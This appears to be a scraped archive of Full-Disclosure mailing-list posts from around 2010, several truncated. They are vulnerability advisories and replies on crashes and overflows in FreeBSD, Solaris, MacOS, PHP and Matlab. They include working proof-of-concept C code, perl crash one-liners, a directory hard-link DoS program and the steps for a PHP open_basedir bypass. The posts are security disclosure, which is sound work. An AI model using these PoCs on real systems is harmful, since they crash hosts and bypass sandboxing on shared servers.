When we have access to few users via ssh, use openssh. Example attack by ssh (POC:http://securityreason.com/achievement_exploitalert/16): 127# ssh c...@0 Password: $ gcc -o poc81 poc81.c $ ./poc81 and in the same time (symetric) 127# ssh m...@0 Password: $ gcc -o poc81 poc81.c $ ./poc81 Result: Jul 29 08:41:29 127 kernel: maxproc limit exceeded by uid 1002, please see tuning(7) and login.conf(5). Jul 29 08:42:01 127 last message repeated 31 times Jul 29 08:44:02 127 last message repeated 119 times Jul 29 08:50:27 127 syslogd: kernel boot file is /boot/kernel/kernel Jul 29 08:50:27 127 kernel: maxproc limit exceeded by uid 0, please see tuning(7) and login.conf(5). Jul 29 08:50:27 127 kernel: panic: get_pv_entry: increase vm.pmap.shpgperproc Jul 29 08:50:27 127 kernel: cpuid = 0 Jul 29 08:50:27 127 kernel: Uptime: 13m23s Jul 29 08:50:27 127 kernel: Cannot dump. Device not defined or unavailable. Jul 29 08:50:27 127 kernel: Automatic reboot in 15 seconds - press a key on the console to abort Jul 29 08:50:27 127 kernel: --> Press a key on the console to reboot, Jul 29 08:50:27 127 kernel: --> or switch off the system now. Jul 29 08:50:27 127 kernel: Rebooting... Jul 29 08:50:27 127 kernel: Copyright (c) 1992-2010 The FreeBSD Project. But when we have php-shell from several uid`s, we can also use suphp. Example attack by suphp: 127# cat cxuser.php 127# ls -la total 16 drwxr-xr-x 2 root wheel 512 Jul 29 08:43 . drwxr-xr-x 4 root wheel 512 Jul 29 08:38 .. - -rw-r--r-- 1 cxcx 27 Jul 29 08:38 cxuser.php - -rwxr-xr-x 1 cxcx 7220 Jul 29 08:38 def - -rw-r--r-- 1 max max 27 Jul 29 08:43 maxuser.php now remote request to cxuser.php and maxuser.php curl http://victim/hack/cxuser.php and in the same time curl http://victim/hack/maxuser.php result: Jul 29 08:43:07 localhost login: ROOT LOGIN (root) ON ttyv0 Jul 29 08:48:30 localhost syslogd: kernel boot file is /boot/kernel/kernel Jul 29 08:48:30 localhost kernel: maxproc limit exceeded by uid 1001, please see tuning(7) and login.conf(5). Jul 29 08:48:30 localhost kernel: panic: get_pv_entry: increase vm.pmap.shpgperproc Jul 29 08:48:30 localhost kernel: cpuid = 0 Jul 29 08:48:30 localhost kernel: Uptime: 4m43s Jul 29 08:48:30 localhost kernel: Jul 29 08:48:30 localhost kernel: Dump failed. Partition too small. Jul 29 08:48:30 localhost kernel: Automatic reboot in 15 seconds - press a key on the console to abort Jul 29 08:48:30 localhost kernel: Rebooting... Jul 29 08:48:30 localhost kernel: Copyright (c) 1992-2010 The FreeBSD Project. - ---debug log - cron (uid=0)--- ... maxproc limit exceeded by uid 1002, please see tuning(7) and login.conf(5). maxproc limit exceeded by uid 1001, please see tuning(7) and login.conf(5). maxproc limit exceeded by uid 1001, please see tuning(7) and login.conf(5). maxproc limit exceeded by uid 1002, please see tuning(7) and login.conf(5). panic: get_pv_entry: increase vm.pmap.shpgperproc cpuid = 0 KDB: enter: panic [ thread pid 7417 tid 106207 ] Stopped at kdb_enter+0x3a: movl $0,kdb_why ... KDB: enter: panic [ thread pid 7417 tid 106207 ] Stopped at kdb_enter+0x3a: movl $0,kdb_why db> ps pid ppid pgrp uid state wmesg wchan cmd 7417 880 880 0 RL CPU 0 cron 7416 880 880 0 RL cron 7415 7413 880 0 RVL cron 7414 7412 7412 0 R sh 7413 880 880 0 D ppwait 0xc8118548 cron 7412 7411 7412 0 Ss wait 0xc8118aa0 sh 7411 880 880 0 S piperd 0xc4d7eab8 cron 7410 5367 1294 1001 RL+ def 7409 5366 1294 1001 RL+ def 7408 5365 1294 1001 RL+ def 7407 5364 1294 1001 RL+ def 7406 5363 1294 1001 RL+ def 7405 5362 1294 1001 RL+ def 7404 5361 1294 1001 RL+ def ... db> trace Tracing
[Full-disclosure] Sun Solaris 10 libc/*convert (*cvt) buffer overflow
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ Sun Solaris 10 libc/*convert (*cvt) buffer overflow ] Author: Maksymilian Arciemowicz http://SecurityReason.com Date: - - Dis.: 15.04.2010 - - Pub.: 21.05.2010 Affected Software: - - Sun Solaris 10 10/9 Original URL: http://securityreason.com/achievement_securityalert/86 - --- 0.Description --- SYNOPSIS #include char *econvert(double value, int ndigit, int *decpt, int *sign, char *buf); char *fconvert(double value, int ndigit, int *decpt, int *sign, char *buf); char *gconvert(double value, int ndigit, int trailing, char *buf); char *seconvert(single *value, int ndigit, int *decpt, int *sign, char *buf); char *sfconvert(single *value, int ndigit, int *decpt, int *sign, char *buf); char *sgconvert(single *value, int ndigit, int trailing, char *buf); char *qeconvert(quadruple *value, int ndigit, int *decpt, int *sign, char *buf); char *qfconvert(quadruple *value, int ndigit, int *decpt, int *sign, char *buf); char *qgconvert(quadruple *value, int ndigit, int trailing, char *buf); The econvert() function converts the value to a null- terminated string of ndigit ASCII digits in buf and returns a pointer to buf. buf should contain at least ndigit+1 char- acters. The position of the decimal point relative to the beginning of the string is stored indirectly through decpt. Thus buf == "314" and *decpt == 1 corresponds to the numeri- cal value 3.14, while buf == "314" and *decpt == -1 corresponds to the numerical value .0314. If the sign of the result is negative, the word pointed to by sign is nonzero; otherwise it is zero. The least significant digit is rounded. SYNOPSIS #include char *ecvt(double value, int ndigit, int *restrict decpt, int *restrict sign); char *fcvt(double value, int ndigit, int *restrict decpt, int *restrict sign); char *gcvt(double value, int ndigit, char *buf); DESCRIPTION The ecvt(), fcvt() and gcvt() functions convert floating- point numbers to null-terminated strings. - --- 1. Sun Solaris 10 libc/*convert (*cvt) buffer overflow --- The main problem exists in sun solaris libc. OpenSolaris is not affected. PoC: - --- # cat jaja.c #include #include int main (int argc, char *argv[]){ char number[1]; int a,b; printf("%s", fconvert((double)0,atoi(argv[1]),&a,&b,number)); return 0; } # /usr/local/bin/gcc -o jaja jaja.c # ./jaja 16 # # ./jaja 512 # - --- for 512 will work fine, because we have used (double)0 to convert. When we use no zero value, then crash. ok. let`s set no zero value in jaja2.c Poc: - --- # cat jaja2.c #include #include int main (int argc, char *argv[]){ char number[1]; int a,b; printf("%s", fconvert((double)1,atoi(argv[1]),&a,&b,number)); return 0; } # /usr/local/bin/gcc -o jaja2 jaja2.c # ./jaja2 512 Segmentation fault (core dumped) # /usr/local/bin/gdb -q jaja2 (no debugging symbols found) (gdb) r 512 Starting program: /jaja2 512 (no debugging symbols found) (no debugging symbols found) Program received signal SIGSEGV, Segmentation fault. 0xfeeab05c in fconvert () from /lib/libc.so.1 (gdb) i r eax0x8047240134509120 ecx0x3250 12880 edx0x8048000134512640 ebx0xfef9e000 -17178624 esp0x8044b380x8044b38 ebp0x8044d680x8044d68 esi0x200512 edi0x0 0 eip0xfeeab05c 0xfeeab05c eflags 0x10206 [ PF IF RF ] cs 0x3b 59 ss 0x43 67 ds 0x43 67 es 0x43 67 fs 0x0 0 gs 0x1c3451 (gdb) x/x $edx 0x8048000: Cannot access memory at address 0x8048000 (gdb) - --- the same result we can get with perl(1) PoC perl: - --- #!/usr/local/bin/perl printf "%.512f", 1; # perl pss.pl Segmentation Fault - core dumped # /usr/local/bin/gdb -q perl (no debugging symbols found) (gdb) r pss.pl Starting program: /usr/bin/perl pss.pl (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no d
[Full-disclosure] Sun Solaris 10 filesystem rm(1), find(1), etc, Denial-of-service
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ Sun Solaris 10 filesystem rm(1),find(1),etc, Denial-of-service ] Author: Maksymilian Arciemowicz SecurityReason.com Date: - - Dis.: 17.04.2010 - - Pub.: 21.05.2010 Affected Software: - - Sun Solaris 10 10/09 Original URL: http://securityreason.com/achievement_securityalert/85 - --- 0.Description --- Solaris is a Unix operating system introduced by Sun Microsystems in 1992 as the successor to SunOS. Sun Microsystems, Inc. is a wholly owned subsidiary of Oracle Corporation, selling computers, computer components, computer software, and information technology services. Sun was founded on February 24, 1982. The company was headquartered in Santa Clara, California (part of Silicon Valley), on the former west campus of the Agnews Developmental Center. In computing, ZFS is a combined file system and logical volume manager designed by Sun Microsystems. The features of ZFS include support for high storage capacities, integration of the concepts of filesystem and volume management, snapshots and copy-on-write clones, continuous integrity checking and automatic repair, RAID-Z and native NFSv4 ACLs. - --- 1. Sun Solaris 10 filesystem rm(1),find(1),etc, Denial-of-service --- We can create, deep tree and when we will remove, scan or something else with this tree, affected program will crash with stack overflow sympton PoC: # perl -e '$a="X";for(1..8000){ ! -d $a and mkdir $a and chdir $a }' we need use 1..8000 or bigger value to make stack overflow. in result # du X Segmentation fault (core dumped) # /usr/local/bin/gdb -q du (no debugging symbols found) (gdb) r X Starting program: /usr/bin/du X (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) Program received signal SIGSEGV, Segmentation fault. 0xfeedfc8a in _ndoprnt () from /lib/libc.so.1 (gdb) x/i $eip 0xfeedfc8a <_ndoprnt+12>: push %ebp We can simple remove this dir for 1..8000 # rm -rf X # but let`s try create this # perl -e '$a="Y";for(1..5){ ! -d $a and mkdir $a and chdir $a }' # rm -rf Y Segmentation fault (core dumped) rm(1) has fail! what is wrong? stack overflow # /usr/local/bin/gdb -q rm (no debugging symbols found) (gdb) r -rf Y Starting program: /usr/bin/rm -rf Y (no debugging symbols found) (no debugging symbols found) Program received signal SIGSEGV, Segmentation fault. 0x08051c03 in ?? () (gdb) x/i $eip 0x8051c03: push %ebx # find Y CX >> /dev/null Segmentation fault (core dumped) find(1) also fails! # /usr/local/bin/gdb -q find (no debugging symbols found) (gdb) r Y CX >> /dev/null Starting program: /usr/bin/find Y CX >> /dev/null (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) Program received signal SIGSEGV, Segmentation fault. 0xfeecfc8a in _ndoprnt () from /lib/libc.so.1 (gdb) x/i $eip 0xfeecfc8a <_ndoprnt+12>: push %ebp - --- 2. Fix --- Sun Solaris will fix this issue. - --- 3. Greets --- sp3x Infospec pi3 - --- 4. Contact --- Author: SecurityReason.com [ Maksymilian Arciemowicz ] Email: - - cxib {a\./t] securityreason [d=t} com GPG: - - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg http://securityreason.com/ http://securityreason.com/exploit_alert/ - Exploit Database http://securityreason.com/security_alert/ - Vulnerability Database -BEGIN PGP SIGNATURE- iEYEARECAAYFAkv2fyAACgkQpiCeOKaYa9ZQAwCfUrpH2glAhxCZVwpvOTKp8F38 ssYAoMKcw4CX0hjK2CsCEkIAVyO5OB6e =dQfV -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Sun Solaris 10 ftpd Cross-site request forgery
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ Sun Solaris 10 ftpd Cross-site request forgery ] Author: Maksymilian Arciemowicz SecurityReason.com Date: - - Dis.: 24.02.2010 - - Pub.: 21.05.2010 Affected Software: - - Sun Solaris 10 10/09 - - OpenSoalris 2009.06 Original URL: http://securityreason.com/achievement_securityalert/84 - --- 0.Description --- in.ftpd is the Internet File Transfer Protocol (FTP) server process. The server may be invoked by the Internet daemon inetd(1M) each time a connection to the FTP service is made or run as a standalone server. CWE-352: When a web server is designed to receive a request from a client without any mechanism for verifying that it was intentionally sent, then it might be possible for an attacker to trick a client into making an unintentional request to the web server which will be treated as an authentic request. This can be done via a URL, image load, XMLHttpRequest, etc. and can result in data disclosure or unintended code execution. - --- 1. Sun Solaris 10 ftpd Cross-site request forgery --- The main problem exists in dividing long command for few others. The problem stems from the fact the use of the loop for(;;) and function fgets(). etc Example: ftp://ftp.sun.com // /stat or ftp://ftp.sun.com
[Full-disclosure] MacOS X 10.6.3 filesystem hfs Denial of Service Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ MacOS X 10.6.3 filesystem hfs Denial of Service Vulnerability ] Author: Maksymilian Arciemowicz http://SecurityReason.com Date: - - Dis.: 01.04.2010 - - Pub.: 23.04.2010 CVE: CVE-2010-0105 Risk: Medium Affected Software: - - MacOS 10.6 (tested on 1062 and 1063) NOTE: Prior versions may also be affected. Orginal URL: http://securityreason.com/achievement_securityalert/83 - --- 0.Description --- Mac OS is the trademarked name for a series of graphical user interface-based operating systems developed by Apple Inc. (formerly Apple Computer, Inc.) for their Macintosh line of computer systems. The Macintosh user experience is credited with popularizing the graphical user interface. The original form of what Apple would later name the "Mac OS" was the integral and unnamed system software first introduced in 1984 with the original Macintosh, usually referred to simply as the System software. - --- 1. MacOS X 10.6.3 filesystem hfs Denial of Service --- The main problem exist in implementation of filesystem (hfs). MacOS X 10.6.3 has default hfs filesystem, so the problem came, when we create a special structure with hardlinks. Interesting information is in wikipedia : http://en.wikipedia.org/wiki/Hard_link - --- ... Most modern operating systems don't allow hard links on directories to prevent endless recursion. A notable exception to this is Mac OS X v10.5 (Leopard) which uses hard links on directories for the Time Machine backup mechanism only. ... - --- In 10.6 we can't use ln(1) command to create hardlink to directory (example: # ln C/C CX ). Anyway, we can use link(3) function and we don't need any special privileges! It hear nice to exploit it.. let's try To show this issue, we need use this program: ( http://securityreason.com/achievement_exploitalert/15 ) - --- hfs_poc.c --- /* Proof of Concept for CVE-2010-0105 MacOS X 10.6 hfs file system attack (Denial of Service) by Maksymilian Arciemowicz from SecurityReason.com http://securityreason.com/achievement_exploitalert/15 NOTE: This DoS will be localized in phase Checking multi-linked directories So we need activate it with line connlink("C/C","CX"); Now we need create PATH_MAX/2 directory tree to make overflow. and we should get diskutil and fsck_hfs exit with sig=8 ~ x$ diskutil verifyVolume /Volumes/max2 Started filesystem verification on disk0s3 max2 Performing live verification Checking Journaled HFS Plus volume Checking extents overflow file Checking catalog file Checking multi-linked files Checking catalog hierarchy Checking extended attributes file Checking multi-linked directories Maximum nesting of folders and directory hard links reached The volume max2 could not be verified completely Error: -9957: Filesystem verify or repair failed Underlying error: 8: POSIX reports: Exec format error */ #include #include #include #include #include #include #include int createdir(char *name){ if(0!=mkdir(name,((S_IRWXU | S_IRWXG | S_IRWXO) & ~umask(0))| S_IWUSR |S_IXUSR)){ printf("Can`t create %s", name); exit(1);} else return 0; } int comein(char *name){ if(0!=chdir(name)){ printf("Can`t chdir in to %s", name); exit(1);} else return 0; } int connlink(a,b) char *a,*b; { if(0!=link(a,b)){ printf("Can`t create link %s => %s",a,b); exit(1);} else return 0; } int main(int argc,char *argv[]){ int level; FILE *fp; if(argc==2) { level=atoi(argv[1]); }else{ level=512; //default } createdir("C"); //create hardlink createdir("C/C"); //create hardlink connlink("C/C","CX"); //we need use to checking multi-linked directorie comein("C"); while(level--) printf("Level: %i mkdir:%i chdir:%i\n",level, createdir("C"), comein("C")); printf("check diskutil verifyVolume /\n"); return 0; } - --- hfs_poc.c --- or use - --- last.c --- #include #include #include #include #include #include #include #include #include #include /* function mkpath() from mkdir(1)/netbsd * Copyright for mkdir.c (c) 1983, 1992, 1993 * The Regents of the University of Califo
Re: [Full-disclosure] PHP 5.2.12/5.3.1 session.save_path safe_mode and open_basedir bypass
Christian Sciberras wrote: > What exactly are the implications of this? > Surely no one [website] accepts paths. > safe_mode and open_basedir usually use small providers. Of course, this is idiotic use safe_mode and open_basedir when we can bypass it via symlinks. -- Best Regards, pub 1024D/A6986BD6 2008-08-22 uid Maksymilian Arciemowicz (cxib) sub 4096g/0889FA9A 2008-08-22 http://securityreason.com http://securityreason.com/key/Arciemowicz.Maksymilian.gpg signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] PHP 5.2.12/5.3.1 session.save_path safe_mode and open_basedir bypass
[ PHP 5.2.12/5.3.1 session.save_path safe_mode and open_basedir bypass ] Credit: Grzegorz Stachowiak Provided by: SecurityReason.com Date: - Written: 31.01.2010 - Public: 11.02.2010 SecurityRisk: Medium Affected Software: PHP 5.2.12 PHP 5.3.1 Advisory URL: http://securityreason.com/achievement_securityalert/82 Vendor: http://www.php.net --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. A visitor accessing your web site is assigned a unique id, the so-called session id. This is either stored in a cookie on the user side or is propagated in the URL. session.save_path defines the argument which is passed to the save handler. If you choose the default files handler, this is the path where the files are created. Defaults to /tmp. See also session_save_path(). There is an optional N argument to this directive that determines the number of directory levels your session files will be spread around in. For example, setting to '5;/tmp' may end up creating a session file and location like /tmp/4/b/1/e/3/sess_4b1e384ad74619bd212e236e52a5a174If . In order to use N you must create all of these directories before use. A small shell script exists in ext/session to do this, it's called mod_files.sh. Also note that if N is used and greater than 0 then automatic garbage collection will not be performed, see a copy of php.ini for further information. Also, if you use N, be sure to surround session.save_path in "quotes" because the separator (;) is also used for comments in php.ini. 1. session.save_path safe mode and open basedir bypass --- session.save_path can be set via ini_set(), session_save_path() functions. In session.save_path there should be path where you will save yours tmp files. But syntax for session.save_path is: [/PATH] OR [N;/PATH] N - can be also a string (N should be numeric). EXAMPLES: 1. session_save_path("/DIR/WHERE/YOU/HAVE/ACCESS") 2. session_save_path("5;/DIR/WHERE/YOU/HAVE/ACCESS") The main problem came when we use multiple ';' character and when we will create fake directory structure to reduce '../'. Proof of Concept: 0. Create directories: /humhum and /byp 1. set open_basedir = /byp 2. create test.php { session_save_path("/humhum"); session_start(); } 3. php test.php Warning: session_save_path(): open_basedir restriction in effect. File(/humhum) is not within the allowed path(s): (/byp) in /byp/test.php on line 3 4. subdir.php { mkdir("puf"); mkdir(";a"); } 5. php subdir.php 6. cd puf 7. create byp.php { session_save_path(";;/byp/;a/../../humhum"); session_start(); } 8. php byp.php 9. ls /humhum sess_d905eb71c9ad65ce2a845cdb0fed3016 The main problem is located in session.c. PHP doesn't check, that we have used next ';' after first. Creating fake directory structure mkdir ';a' mkdir '../;a' we can reduce directory level using '../' . --- 2. Fix --- Revision 294272 http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/session/session.c?view=log http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/ext/session/session.c?view=log --- 3. Credit --- Founded by: Grzegorz Stachowiak Written by: Maksymilian Arciemowicz Fixed by : Ilia Alshanetsky --- 4. Contact --- Email: - Grzegorz.Stachowiak stachowiak [a,t} analogicode (d_0t} pl - Maksymilian Arciemowicz cxib {a.t] securityreason [d0_t} com GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg http://securityreason.com/ http://securityreason.com/exploit_alert/ - Exploit Database http://securityreason.com/security_alert/ - Vulnerability Database signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MacOS X 10.5/10.6 libc/strtod(3) buffer overflow
I have not checked this issue in macos 10.4. In MacOS 10.1 does not work. But the perl script (in macos 10.5) Chujwamwmuzg.pl --- #!/usr/local/bin/perl printf "% 0.4194310f, 0x0.0x41414141; Chujwamwmuzg.pl --- will crash with esi = 0x41414141 edi = 0x15 Other bugs in libc also work on new versions of macos. Example overflow in FTSENT structure http://securityreason.com/achievement_securityalert/60 http://securityreason.com/achievement_securityalert/68 We confirmed this issue in MacOS 10.1. > Joshua Levitsky wrote: > and it then rebooted my mac :) > > On Mon, Jan 11, 2010 at 1:57 PM, Joshua Levitsky <mailto:jlevi...@joshie.com>> wrote: > > The below hosed my terminal session on 10.4.11... I did this in a > >console login so don't have the results.. You need? or is dropping > me to a blue screen and lack of system response good? > > #!/usr/local/bin/perl > printf "%0.4194310f", 0x0.0x41414141; > > > Perl will crash with > esi = 0x41414141 > edi = 0x15 > > -Josh -- Best Regards, -------- pub 1024D/A6986BD6 2008-08-22 uid Maksymilian Arciemowicz (cxib) sub 4096g/0889FA9A 2008-08-22 http://securityreason.com http://securityreason.com/key/Arciemowicz.Maksymilian.gpg signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MacOS X 10.5/10.6 libc/strtod(3) buffer overflow
Joshua Levitsky wrote: > On Thu, Jan 7, 2010 at 7:20 PM, Maksymilian Arciemowicz > mailto:c...@securityreason.com>> wrote: > > [ MacOS X 10.5/10.6 libc/strtod(3) buffer overflow ] > > Author: Maksymilian Arciemowicz and sp3x > http://SecurityReason.com > > CVE: CVE-2009-0689 > CWE: CWE-119 > Risk: High > Remote: Yes > > > I tested doing "printf %1.262159f 1.1" in a shell login on 10.4.11 and > it took out my session. I imagine this means 10.4.11 is vulnerable as > well no? Tiger is still very popular in enterprise environments that are > slow to upgrade. > > -- > Joshua Levitsky, MCSE, CISSP > http://www.jnuxhosting.net > http://www.jnux.net > http://blog.joshie.com/ > [5957 F27C 9C71 E9A7 274A 0447 C9B9 75A4 9B41 D4D1] > Could you check perl PoC ? It should overwrite esi and edi register esi=0x41414141 edi=15 -- Best Regards, ---- pub 1024D/A6986BD6 2008-08-22 uid Maksymilian Arciemowicz (cxib) sub 4096g/0889FA9A 2008-08-22 http://securityreason.com http://securityreason.com/key/Arciemowicz.Maksymilian.gpg signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] MacOS X 10.5/10.6 libc/strtod(3) buffer overflow
[ MacOS X 10.5/10.6 libc/strtod(3) buffer overflow ] Author: Maksymilian Arciemowicz and sp3x http://SecurityReason.com Date: - Dis.: 07.05.2009 - Pub.: 08.01.2010 CVE: CVE-2009-0689 CWE: CWE-119 Risk: High Remote: Yes Affected Software: - MacOS 10.6 NOTE: Prior versions may also be affected. Original URL: http://securityreason.com/achievement_securityalert/81 --- 0.Description --- Mac OS is the trademarked name for a series of graphical user interface-based operating systems developed by Apple Inc. (formerly Apple Computer, Inc.) for their Macintosh line of computer systems. The Macintosh user experience is credited with popularizing the graphical user interface. The original form of what Apple would later name the "Mac OS" was the integral and unnamed system software first introduced in 1984 with the original Macintosh, usually referred to simply as the System software. --- 1. MacOS X 10.5/10.6 libc/strtod(3) buffer overflow --- The main problem exist in dtoa implementation. MacOS X has the same dtoa as OpenBSD, NetBSD etc. This problem affects not only libc/gdtoa. Affected is also strtod(3) function. For more information, please see SREASONRES:20090625. http://securityreason.com/achievement_securityalert/63 but fix for SREASONRES:20090625, used by openbsd was not good. More information about fix for openbsd and similars SREASONRES:20091030, http://securityreason.com/achievement_securityalert/69 We can create any number of float, which will overwrite the memory. In Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it is possible to call 16<= elements of freelist array. It is true that the examples presented in the previous notes, using the printf (1) do not work under MacOS X. This does not mean the MacOSX C library is safe. More: http://cwe.mitre.org/data/definitions/119.html --- 2. Proof of Concept (PoC) --- --- 2.1. strtod(3) buffer overflow example PoC --- #include #include int main () { char number[] = "0.11...11", *e; double weed = strtod(number, &e); printf("grams = %lf\n", weed); return 0; } (gdb) r Starting program: /Volumes/ARC/299 Reading symbols for shared libraries ++. done Program received signal EXC_BAD_ACCESS, Could not access memory. Reason: KERN_PROTECTION_FAILURE at address: 0x0039f000 0x002271ac in __diff_D2A () (gdb) i r eax0xc71c71c7 -954437177 ecx0xacb44 707396 edx0x0 0 ebx0x2c2e4f 2895439 esp0xbffb65d0 0xbffb65d0 ebp0xbffb6618 0xbffb6618 esi0x39f000 3796992 edi0x0 0 eip0x2271ac 0x2271ac <__diff_D2A+246> eflags 0x10246 66118 cs 0x17 23 ss 0x1f 31 ds 0x1f 31 es 0x1f 31 fs 0x0 0 gs 0x37 55 edi=0x0 eax=0xc71c71c7 eip=0x002271ac (gdb) x/i 0x002271ac 0x2271ac <__diff_D2A+246>: mov%eax,(%esi) --- 2.2. atof(3) buffer overflow example PoC --- #include #include int main() { char s[]="111.11...11"; float a=atof(s); printf("%f",a); } x$ ls -la m0.c -rwxrwxrwx@ 1 x staff 317507 Jan 3 14:23 m0.c x$ gcc -o m0 m0.c x$ ./m0 Bus error Program received signal EXC_BAD_ACCESS, Could not access memory. Reason: KERN_PROTECTION_FAILURE at address: 0x0039f000 0x00227017 in __lshift_D2A () (gdb) x/i 0x00227017 0x227017 <__lshift_D2A+68>: movl $0x0,(%edx) (gdb) i r eax0x16bc 5820 ecx0x80b6 32950 edx0x39f000 3796992 ebx0x2c2e4f 2895439 esp0xbffb2070 0xbffb2070 ebp0xbffb20b8 0xbffb20b8 esi0x26bd 9917 edi0x80b7 32951 eip0x227017 0x227017 <__lshift_D2A+68> eflags 0x10203 66051 cs 0x17 23 ss 0x1f 31 ds 0x1f 31 es 0x1f 31 fs 0x0 0 gs 0x37 55 (gdb) bt #0 0x00227017 in __lshift_D2A () #1 0x002c3b74 in strtod_l$UNIX2003 () #2 0x00275ba7 in atof () #3 0x17eb in main () --- 3. SecurityReason Note --- Officialy SREASONRES:20090625 has been detected in: - OpenBSD - NetBSD - FreeBSD - MacOSX - Google Chrome - Mozilla Firefox - Mozilla Seamonkey - Mozilla Thunderbird - Mozilla Sunbird - Mozilla Camino - KDE (example: konqueror) - Opera - K-Meleon - F-Lock - MatLab - J This list is not yet closed. FreeBSD project has fixed this issue (state 2010-01-05) only in MAIN RELENG_8_0_BP RELENG_8_0_0_RELEASE RELENG_8_0 RELENG_7 RELENG_6 Please note that the issue can also exist in Sony PlayStation 3. The license of PS3 : http://www.scei.co.jp/ps3-license/see.html --- The separate 'dtoa.c' file is separately licenced, thus: Copyright. 1991, 2000 by Lucent Technologies. --- MacOS gdtoa have also "Lucent
[Full-disclosure] Matlab R2009b Array Overrun (code execution)
[ Matlab R2009b Array Overrun (code execution) ] Author: Maksymilian Arciemowicz and sp3x http://SecurityReason.com Date: - Dis.: 07.05.2009 - Pub.: 08.01.2009 CVE: CVE-2009-0689 CWE: CWE-119 Risk: High Remote: Yes Affected Software: - Matlab R2009b NOTE: Prior versions may also be affected. Original URL: http://securityreason.com/achievement_securityalert/80 --- 0.Description --- MATLAB is a numerical computing environment and fourth generation programming language. Developed by The MathWorks, MATLAB allows matrix manipulation, plotting of functions and data, implementation of algorithms, creation of user interfaces, and interfacing with programs in other languages. Although it is numeric only, an optional toolbox uses the MuPAD symbolic engine, allowing access to computer algebra capabilities. An additional package, Simulink, adds graphical multidomain simulation and Model-Based Design for dynamic and embedded systems. In 2004, MathWorks claimed that MATLAB was used by more than one million people across industry and the academic world --- 1. Matlab 2009b Array Overrun (code execution) --- The main problem exist in dtoa implementation. Matlab has the same dtoa as Mozilla, OpenBSD, MacOS, Google, Opera etc. and it is the same like SREASONRES:20090625. http://securityreason.com/achievement_securityalert/63 but fix for SREASONRES:20090625, used by openbsd was not good. More information about fix for openbsd and similars SREASONRES:20091030, http://securityreason.com/achievement_securityalert/69 We can create any number of float, which will overwrite the memory. In Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it is possible to call 16<= elements of freelist array. --- 2. Proof of Concept (PoC) --- There are several ways to make a successful attack. Simplest assumed the creation of a script with a defective floating-point variable and execution it. This will allow the possibility of code execution. -expl.m-- cxib=0. -expl.m-- MATLAB crash file:C:\DOCUME~1\WinXPae\USTAWI~1\Temp\matlab_crash_dump.552 Segmentation violation detected at Wed Dec 03 12:04:02 2009 Configuration: MATLAB Version: 7.9.0.529 (R2009b) MATLAB License: [PRIV] Operating System: Microsoft Windows XP Window System:Version 5.1 (Build 2600: Dodatek Service Pack 3) Processor ID: x86 Family 6 Model 7 Stepping 6, GenuineIntel Virtual Machine: Java 1.6.0_12-b04 with Sun Microsystems Inc. Java HotSpot(TM) Client VM mixed mode Default Encoding: windows-1250 Fault Count: 1 Register State: EAX = 71c71c71 EBX = 188ade48 ECX = 000a EDX = 188adde0 ESI = 0002 EDI = 0003 EBP = 00c3dec0 ESP = 00c3de90 EIP = 7baf965e FLG = 00010206 Stack Trace: [0] libut.dll:_Balloc(0x188adde0, 0x188ade48, 10, 1) + 14 bytes [1] libut.dll:_s2b(0x188adde0, 33, 33, 0x069f6bc7) + 112 bytes [2] libut.dll:_ut_strtod(0x188adde0, 0x19a80048 "0.11..", 0x00c3e024, 0x00c3e028) + 1123 bytes [3] m_ir.dll:_mps_parse_matlab_real(0x188ad9f0, 0x00c3e068, 11, 0) + 576 bytes [4] m_parser.dll:_mps_convert_M_NUMBER(0x188afb90, 0x1971d070, 0x1971d048, 0x188afb90) + 71 bytes [5] m_parser.dll:_mps_convert_lval(0x188afb90, 0x1971d048, 0x1971d070, 0) + 224 bytes [6] m_parser.dll:_mps_convert_M_Primary_4(0x188afb90, 0x1971d084, 0x1971d0e8, 0x188afb90) + 191 bytes [7] m_parser.dll:_mps_convert_M_Stmt_2(0x188afb90, 0x1971d0d4, 0x1971d0e8, 0x188afb90) + 247 bytes [8] m_parser.dll:_mps_convert_M_Stmts_2(0x188afb90, 0x1971d0e8, 0x188afb90, 0x199d95b0) + 703 bytes [9] m_parser.dll:_mps_make_M_body_from_parse_tree(0x1971d0e8, 0, 37, 0) + 1283 bytes [10] m_parser.dll:_mps_convert_script(0x00c3e788, 18, 0x00c3e550 "đĺĂ", 0x7a36323f) + 1073 bytes [11] m_parser.dll:_mps_convert_M_File_1(0x188afb90, 0x189b3960, 0x188afb90, 0x189b3960) + 66 bytes [12] m_parser.dll:_mps_M_to_IR_eval(0x00c3e7b4, 0x00c3e774, 0x00c3e778, 0x00c3e77c) + 1471 bytes [13] m_parser.dll:_mps_M_to_IR(0x00c3e80f, 0x00c3e7b4, 0x00c3e774, 0x00c3e778) + 307 bytes [14] 